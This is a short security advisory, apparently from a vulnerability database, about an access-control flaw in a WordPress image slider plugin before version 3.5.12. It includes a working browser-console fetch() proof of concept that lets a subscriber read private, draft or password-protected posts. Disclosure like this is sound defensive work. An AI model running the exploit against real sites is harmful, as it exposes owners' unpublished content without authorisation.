Slider - Ultimate Responsive Image Slider < 3.5.12 - Subscriber+ Arbitrary Post Access

Description The plugin does not ensure that posts to be accessed via an AJAX action are slides and can be viewed by the user making the request, allowing any authenticated users, such as subscriber to access the content arbitrary post such as private, draft and password protected

PoC

Run the below command in the developer console of the web browser while being on the blog as subscriber user (4 being the ID of a private/draft/password protected post) fetch(“/wp-admin/admin-ajax.php?action=uris_get_thumbnail”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: “imageid=4”, “method”: “POST”, }).then((response) => {return response.text(); }) .then((data) => { console.log(data); }) The content of the post will be displayed in the rpgp_image_desc textarea.